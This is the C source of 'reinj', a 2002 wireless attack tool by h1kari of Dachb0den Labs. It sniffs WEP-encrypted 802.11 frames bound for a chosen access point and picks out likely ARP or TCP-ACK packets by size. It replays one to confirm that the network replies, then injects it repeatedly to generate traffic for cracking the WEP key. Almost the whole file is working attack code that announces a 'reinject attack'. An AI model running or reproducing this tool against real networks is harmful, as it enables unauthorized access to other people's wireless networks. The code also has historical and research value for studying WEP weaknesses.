/*
 * reinj v0.1 [reinj.c]
 * by h1kari - (c) Dachb0den Labs 2002
 */

/*
 * Copyright (c) 2001 Dachb0den Labs.
 *      David Hulton <h1kari@dachb0den.com>.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by David Hulton.
 * 4. Neither the name of the author nor the names of any co-contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY David Hulton AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL David Hulton OR THE VOICES IN HIS HEAD
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
 * THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <dev/ic/if_wi_ieee.h>
#include <dev/ic/if_wireg.h>

#include <pcap.h>

/*
 * definitions
 */
#define PCAP_SNAPLEN    2304
#define PCAP_PROMISC    1
#define PCAP_TOMS       256
#define hz		100

#define HDR_SIZE        16
#define TCPACK_MIN_SIZE (40 + HDR_SIZE)
#define TCPACK_MAX_SIZE (52 + HDR_SIZE)
#define TCPRST_SIZE     (40 + HDR_SIZE)
#define ARP_SIZE        (28 + HDR_SIZE)
#define ARP_PADDED_SIZE (28 + 12 + HDR_SIZE)
#define BROADCAST       "\xff\xff\xff\xff\xff\xff"

#define RETRY_COUNT     5
#define RETRY_INTERVAL  1000000
#define RETRY_TIMEOUT   1000000

#define BANNER \
 "* reinj v0.1 by h1kari <h1kari@dachb0den.com> *\n" \
 "* Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] *\n"

/*
 * declarations
 */
char *dev;
u_char bssid[6];
int tries, interval;

/*
 * stop our kernel level transmit on control+c or other die signal
 */
void
stoptx(int signo)
{
  if(inject_80211_stop(dev) == -1)
    fprintf(stderr, "error: unable to stop injection on device\n");

  _exit(2);
}

/*
 * print program usage
 */
void
usage(char *progname) {
  fprintf(stderr, "usage: %s <dev> <bssid> <tries> <interval>\n", progname);
  exit(2);
}

/*
 * open device and look for our tcp acks and arps
 */
int
main(int argc, char *argv[]) {
  int i, norm, buf_len, diff, tmp[6];
  char errbuf[PCAP_ERRBUF_SIZE];
  u_char *pkt, buf[PCAP_SNAPLEN + 8];
  struct wi_frame *wi_h, *try_h;
  struct timeval then, now;
  struct pcap_pkthdr h;
  pcap_t *p;

  if(argc < 5)
    usage(argv[0]);

  dev = argv[1];
  tries = atoi(argv[3]);
  interval = atoi(argv[4]);

  if(sscanf(argv[2], "%x:%x:%x:%x:%x:%x", &tmp[0], &tmp[1], &tmp[2],
   &tmp[3], &tmp[4], &tmp[5]) < 6) {
    fprintf(stderr, "error: unable to parse bssid\n");
    exit(2);
  }

  for(i = 0; i < 6; i++)
    bssid[i] = tmp[i] & 0xff;

  if((p = pcap_open_live(dev, PCAP_SNAPLEN, PCAP_PROMISC, PCAP_TOMS,
   errbuf)) == NULL) {
    fprintf(stderr, "error: unable to open pcap device\n");
    exit(2);
  }

  printf("\n%s\n", BANNER);

  printf("starting reinject attack...\n"
   " device: %s\n"
   " bssid: %02x:%02x:%02x:%02x:%02x:%02x\n\n",
   dev, bssid[0], bssid[1], bssid[2],
   bssid[3], bssid[4], bssid[5]);

  while(1) {
    if((pkt = (u_char *)pcap_next(p, &h)) == NULL) continue;
    wi_h = (struct wi_frame *)pkt;

    printf("."); fflush(stdout);

    if(!((!(letoh16(wi_h->wi_status) & WI_STAT_BADCRC)) &&
     ((letoh16(wi_h->wi_frame_ctl) & WI_FCTL_FTYPE) == WI_FTYPE_DATA) &&
     (letoh16(wi_h->wi_frame_ctl) & WI_FCTL_TODS) &&
     (letoh16(wi_h->wi_frame_ctl) & WI_FCTL_WEP) && 
     (memcmp(wi_h->wi_addr1, bssid, 6) == 0)))
      continue;
    if((letoh16(wi_h->wi_dat_len) == ARP_SIZE) ||
     ((letoh16(wi_h->wi_dat_len) == ARP_PADDED_SIZE) &&
     (memcmp(wi_h->wi_addr3, BROADCAST, 6) == 0)))
      norm = 0;
    else if((letoh16(wi_h->wi_dat_len) >= TCPACK_MIN_SIZE) && 
     (letoh16(wi_h->wi_dat_len) <= TCPACK_MAX_SIZE))
      norm = 1;
    else
      continue;

    memcpy(buf, pkt, 60);
    memcpy(buf + 60, "\xaa\xaa\x03\x00\x00\x00\x08\x00", 8);
    memcpy(buf + 68, pkt + 60, h.caplen - 60);
    buf_len = h.caplen;

    wi_h = (struct wi_frame *)buf;

    printf("\ngot possible %s packet, reinjecting to test...\n",
     norm ? "tcp-ack" : "arp");

    wi_h->wi_ts0 = 0;
    wi_h->wi_ts1 = 0;
    wi_h->wi_silence = 0;
    wi_h->wi_signal = 0;
    wi_h->wi_rate = 0x6e;
    wi_h->wi_rx_flow = 0;
    wi_h->wi_tx_rtry = 0;
    wi_h->wi_tx_rate = 0x6e;
    wi_h->wi_tx_ctl = htole16(WI_ENC_TX_MGMT);

    memcpy(wi_h->wi_dst_addr, wi_h->wi_addr3, 6);
    memcpy(wi_h->wi_src_addr, wi_h->wi_addr2, 6);

    sleep(3);

    for(i = 0; i < RETRY_COUNT; i++) {
      usleep(RETRY_INTERVAL);
      printf("                               \r");
      printf("sending try #%d... ", i);
      fflush(stdout);
      inject_80211(dev, buf, buf_len);
      gettimeofday(&then, NULL);
      while(1) {
        gettimeofday(&now, NULL);
        diff = (now.tv_sec - then.tv_sec) * 1000000;
        diff = diff + (now.tv_usec - then.tv_usec);
        if(diff >= RETRY_TIMEOUT) goto bad;

        if((pkt = (u_char *)pcap_next(p, &h)) == NULL) continue;

        try_h = (struct wi_frame *)pkt;
        if(!(letoh16(try_h->wi_status) & WI_STAT_BADCRC) &&
         ((letoh16(try_h->wi_frame_ctl) & WI_FCTL_FTYPE) == WI_FTYPE_DATA) &&
         (letoh16(try_h->wi_frame_ctl) & WI_FCTL_TODS) &&
         (letoh16(try_h->wi_frame_ctl) & WI_FCTL_WEP) &&
         (memcmp(wi_h->wi_addr1, try_h->wi_addr1, 6) == 0) &&
         (memcmp(wi_h->wi_addr2, try_h->wi_addr3, 6) == 0) &&
         (norm ?
         ((letoh16(try_h->wi_dat_len) == TCPRST_SIZE) &&
         (memcmp(wi_h->wi_addr3, try_h->wi_addr2, 6) == 0)) :
         ((letoh16(try_h->wi_dat_len) == ARP_SIZE) ||
         (letoh16(try_h->wi_dat_len) == ARP_PADDED_SIZE)))) {
          printf("got reply!\r"); fflush(stdout);
          goto next;
        }
      }
      next:
    }

    printf("injecting %d times (or until ctrl+c) at %d interval:\n",
     tries, interval);
    sleep(3);

    signal(SIGINT, stoptx);
    signal(SIGQUIT, stoptx);
    signal(SIGKILL, stoptx);
    signal(SIGSEGV, stoptx);
    signal(SIGTERM, stoptx);
    
    inject_80211_start(dev, buf, buf_len, tries, interval);
    while(1) {
      usleep((1000000 / hz) * interval);
      printf("."); fflush(stdout);
    } 
    stoptx(0);

    bad:
    printf("no reply! looking for a better packet...\n");
  }
}
